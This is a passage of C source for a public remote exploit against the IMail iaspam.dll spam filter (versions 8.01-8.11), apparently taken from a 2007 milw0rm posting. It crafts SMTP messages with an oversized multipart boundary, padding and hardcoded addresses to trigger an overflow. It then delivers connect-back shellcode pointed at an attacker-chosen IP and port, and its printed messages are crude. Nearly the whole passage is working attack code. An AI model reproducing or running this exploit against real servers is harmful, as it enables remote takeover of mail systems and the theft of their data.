   //     printf("[+]Fucking Server at %s.\n", szTIME);
   //     memset(buffer, 0, sizeof(buffer));
        
        //print $sock "Content-Transfer-Encoding:$padding2\r\n";
        memset(padding, 0x43, 80);
        //memcpy(padding, "\x43", 80);
        padding[80] = '\x00';

        memset(payload, 0x00, sizeof(payload));
        memcpy(payload, szCTE, strlen((const char*)szCTE));
        memcpy(payload+strlen((const char*)szCTE), padding, strlen((const char*)padding));
        memcpy(payload+strlen((const char*)szCTE)+strlen((const char*)padding), "\r\n", 2);

        send(s, (const char *)payload, strlen((const char *)payload), 0);
        Sleep(200);

        // Â·Â¢Ã‹Ãshellcode¹ýÈ¥±£Žæ
        memset(payload, 0x00, sizeof(payload));
        memcpy(payload, sh_Buff, strlen((const char*)sh_Buff));
        memcpy(payload+strlen((const char*)sh_Buff), "\r\n", 2);
        
        send(s, (const char *)payload, strlen((const char *)payload), 0);

        memset(payload, 0x00, sizeof(payload));
        


    } 
    else       //  ÂµÃšÃˆÃ½Â·Ã¢Ã“ÊŒþ£¬¹¹ÔìÒç³ö
    {
        Sleep(500);  // Ã’òΪҪŽ¥·¢Â©¶ŽÁË£¬ËùÒÔ±ØÐëÒªÍíµã£¬²»È»shellcodeûµœÎ»
        /*
           my $padding = "\x22"."B"x2028;
           my $padding1 = "B"x2046;
           my $padding11 = "B"x146;   #163žöB
           my $straddr1 = "\x50\xd0\xfd\x7f"."\x30\xd0\xfd\x7f";     # Ã”ÚtebÖÐ
           my $straddr2 = "\x6c\x54\x03\x10";     # shellcode»á¿œ±ŽµœµÄµØÖ·

           print $sock "Content-Type: multipart\/boundary=$padding $padding1 $padding11$straddr1$straddr2\r\n";
        */
        memcpy(payload, szCT, strlen((const char *)szCT));
        //memcpy(payload+strlen(const char *szCT), "\"", 1);
        memset(padding, 0x43, 5000);
        padding[0] = '\x22';   
        padding[2029] = '\x20';
        padding[4076] = '\x20';

        //straddr1
        padding[4223] = '\x50';
        padding[4224] = '\xd0';
        padding[4225] = '\xfd';
        padding[4226] = '\x7f';
        padding[4227] = '\x30';
        padding[4228] = '\xd0';
        padding[4229] = '\xfd';
        padding[4230] = '\x7f';

        //straddr2  Å½Â¥Â·Â¢Ã’ç³öµÄµØÖ·
        padding[4231] = '\x6c';
        padding[4232] = '\x54';
        padding[4233] = '\x03';
        padding[4234] = '\x10';

        padding[4235] = '\x0d';
        padding[4236] = '\x0a';
        padding[4237] = '\x00';

        
        memcpy(payload+strlen((const char *)szCT), padding, strlen((const char *)padding));
        send(s, (const char *)payload, strlen((const char *)payload), 0);

        // MIME
         send(s, (const char *)szMIME, strlen((const char *)szMIME), 0);
   //    recv(s, buffer, sizeof(buffer), 0);
  //    printf("%s", buffer);
   //     printf("[+]Fucking Server at %s.\n", szTIME);
   //     memset(buffer, 0, sizeof(buffer));
        
        //print $sock "Content-Transfer-Encoding:$padding2\r\n";
        memset(padding, 0x43, 80);
        //memcpy(padding, "\x43", 80);
        padding[80] = '\x00';

        memset(payload, 0x00, sizeof(payload));
        memcpy(payload, szCTE, strlen((const char*)szCTE));
        memcpy(payload+strlen((const char*)szCTE), padding, strlen((const char*)padding));
        memcpy(payload+strlen((const char*)szCTE)+strlen((const char*)padding), "\r\n", 2);

        send(s, (const char *)payload, strlen((const char *)payload), 0);
        Sleep(200);

        // send payload  ÃÃžÅ¾Ã„ÖžÕëµØÖ·£¬¹¹Ôì³öÒç³ö
        memset(payload, 0x00, sizeof(payload));
        // ÃÃ¨Ã’ªÖžÏò¹¹ÔìÒç³ö×Ö·ûŽ®µÄµØÖ·£¬ÒÔŒ°2žö¿ÉÐŽµØÖ·
        memcpy(payload, "\x50\xc0\xfd\x7f", 4);
        memcpy(payload+4, "\x40\xc0\xfd\x7f\x30\xc0\xfd\x7f", 8);
        memcpy(payload+12, "\r\n", 2);
        
        send(s, (const char *)payload, strlen((const char *)payload), 0);

        memset(payload, 0x00, sizeof(payload));

    }


    // END
    Sleep(500);
    send(s, szEND, strlen(szEND), 0);
    recv(s, buffer, sizeof(buffer), 0);
    if(strstr(buffer, "250"))
      printf("[+]Recv: %s", buffer);
    else
        {
            printf("[-]Seems Service Down~ :( \n");
            Disconnect(s);
            return -1;
        }
    memset(buffer, 0, sizeof(buffer));    // QUIT
    send(s, szQUIT, strlen(szQUIT), 0);
    recv(s, buffer, sizeof(buffer), 0);
//    printf("%s", buffer);
    printf("[+]Fucking END, Ejaculating Now !\n\n");
    memset(buffer, 0, sizeof(buffer));

    
    Sleep(400);

    closesocket(s);

    WSACleanup();

    return 0;

}
int main(int argc, char *argv[])
{

    
    //int  imail_ver = 0;    //imail version  (buffer²»Í¬)
    //int  ret;

    //SOCKET  s;
    //WSADATA WSAData;

    printf("\n== IMail iaspam.dll 8.01-8.11 Private Remote Exploit\n");
    printf("== by axis@ph4nt0m\n");
    printf("== http://www.ph4nt0m.org\n");
    printf("== 2007-06\n");
    printf("== 2007-09-18 published as a gift for the 6th Anniversary of Ph4nt0m\n");
    printf("== ConnBack Version\n");
    printf("== Thanks EnvyMask@ph4nt0m\n\n");


    if(argc != 5)
    {
        help(argv[0]);
        return 0;
    }

    if(argc == 5) port = atoi(argv[4]);


    GetShellCode(argv[3], port);
    if (!sh_Len)
    {
        printf("[-] Shellcode generate error.\n");
        exit(1);
    }


    //printf("shellcode length is: %d \n",strlen((char *)sh_Buff));
    //PrintSc(sh_Buff, sh_Len);


    Sleep(200);

    for (int mail_payload = 0; mail_payload <= 3; mail_payload++)
    {
        //printf("[+]Now Sending the %d fucking Mail!\n",mail_payload+1);
        sendfuckingmail(mail_payload, argv[1], atoi(argv[2]));
        Sleep(2000);
    }
    
    printf("Got a Shell on your port ?! @_@\n\n");


    return 1;

}

// milw0rm.com [2007-09-21]